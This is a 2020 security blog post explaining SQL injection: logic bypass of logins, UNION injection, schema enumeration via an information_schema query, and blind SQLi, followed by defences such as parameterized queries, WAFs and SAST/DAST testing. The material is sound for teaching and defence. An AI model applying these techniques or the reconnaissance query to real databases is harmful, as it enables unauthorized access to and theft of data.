Fixing SQL Injection: ORM is not enough

SQL Injection (SQLi) Attack

Website security is a top concern of businesses, security analysts, and users. Why? Everyone wants to feel that submitting a financial balance transfer or reviewing their medical records is safe and protected from unauthorized access by hackers and cybercriminals.

Unfortunately, that’s not always the case, as the Open Web Application Security Project (OWASP) has indicated by placing injection at the top of their top 10 application security risk list. Injection – including SQL injection – can cause many problems for business and consumers alike, such as:

  • Loss, exposure, or corruption of data in databases
  • Website defacement or manipuation
  • Embed malicious code in the application

In 2019 the number of SQL vulnerabilities in Java ecosystem has reduced, a different trend can be observed in PHP.

SQL injection vulnerabilities graph by year
Source: State of Open Source Security Report 2020 by Snyk

While the overall number of new SQL vulnerabilities in 2019 was low, SQL injection can be very impactful. Hence it is critical to know what is SQL injection, and how does it work? Let’s find out more. 

What is SQL Injection?

SQL Injection – sometimes referred to simply as SQLi – is a common method used by attackers to manipulate and access database information that would otherwise not be displayed or provided to the website user. 

This is accomplished through exploiting application vulnerabilities to inject malicious SQL code that alters SQL queries to retrieve and even alter or delete data that the logged-in user has no granted authority to.

What are the SQL Queries?

SQL (structured query language) is utilized to interact with a database and common statements such as select, insert, delete, update, and others. Many popular database structures (Oracle, Access, Microsoft SQL Server, and others) are accessible with SQL commands, although each provides additional proprietary functions, as well.

SQL queries are SQL commands that include parameters such as database actions to be taken, content to be included, and filters to be applied. A simple example is:


WHERE status=’active’

Order by State, City

This command will select all records from a table named PAYROLL where the employee status is active and sort the results by State, then City.

Using SQL injection techniques, a hacker can alter the SQL query to remove the ‘active’ selection criteria and gain access to all employees in the PAYROLL database, or worse – change the SELECT command to DELETE.

What is an SQL Injection Attack?

Hackers launching an SQL injection attack simply modify an existing SQL command to suit their needs. Many website applications utilize SQL statements for everything from providing a list of customers, to identifying visitors with usernames and passwords against a server-side database. 

By altering a SQL command to remove limitations such as vulnerability scanning for only active employees or those in a specific department to which the user has access, the SQL injection attack can return information about all employees. This could result in revealing personal information that should be restricted.

SQL commands are very powerful functions in website applications, utilized for data retrieval, validation, and storage on server databases. With all the capabilities of SQL and SQL queries, hackers leverage this vulnerability to steal and corrupt data and even plant malicious commands in server databases.

What are the types of of SQL Injections?

Hackers are very creative in utilizing the potential of SQL injection. When a website proves to be vulnerable to SQL injection attacks, the attacker will take advantage in any number of ways:

Manipulating Web Application Logic

Modifying the SQL command to perform an entirely different function that was not intended by the developer. An SQL injection attack could include a login routine that validates user and password information against a server database. By removing the requirement for password matching from the SQL command, the attacker could be successful in logging into the application without a password.

Retrieving Hidden or Unauthorized Data

Removing filters or adding data fields, the result set can provide multiple benefits to the hacker.

For example, data that was not intended to be accessedby the application could be  returned to the hacker. Modifying the requested fields from the table can result in other fields being returned, whether or not the user has proper rights to view the information.

UNION Injection Attacks

A UNION injection attack allows the attacker to append a second query to the application query. This could provide the attacker access to data from entirely different database tables than the developer intended.

Database Examination/Extraction

This type of SQL injection attack allows the perpetrator to obtain information about the database type and structure, which can be useful for additional manipulation or data extraction. For example:

SELECT * from information_schema.tables

Using this command will provide the attacker with a list of database tables, including field information – very useful for further exploitation and damage to tables or content.

Blind SQL Injection

Taking over application functions with a blind SQL injection attack does not result in data being returned to the user, but rather tricks the application into failing by inserting delays in response, executing incorrect functions such as a divide by zero, or other action. 

Blind SQL injections can also be utilized to extract unauthorized data, but the technique is somewhat more complicated than other methods. Numerous tools exist to help automate this process and make it easier for attackers.

How and Why are SQL Injections Performed?

SQL injection is one of the most common methods of extracting unauthorized data from commercial websites. As a result, much of the data winds up in the hands of cyber thieves for identity theft or extortion attempts on businesses. 

Ransomware attacks could be initiated through SQL injection attacks that plant malicious code or commands in databases without detection.

How to Prevent SQL Injection?

When building SQL commands, sanitize or validate any browser-supplied input values that will be used in creating the SQL query. Use DAST/SAST tools to detect issues.

Implement a web application firewall (WAF) that can detect and filter out SQL injection attacks(along with  other vulnerabilities.) Such firewalls weed out known threats with lists of signatures that should be blocked and are updated continuously.

The most common method used to prevent SQL injection is to utilize a more controlled way of coding SQL queries with parameters. This method, often referred to as parameterized queries or prepared statements,  uses a pre-defined query with filter options supplied as parameters, rather than structuring the command strictly from user input content.

Implementing an intrusion detection system can help spot user behaviors attempting to exploit vulnerabilities in applications..

Applying best practices in web application development and conducting SQL injection tests as an integrated step in development will provide better protection from SQL injection vulnerability. Automating static (SAST) and dynamic (DAST) analysis tools into the development pipeline is an effective way to accomplish this additional level of testing

Alyssa Miller Headshot
July 9, 2020
| By Alyssa Miller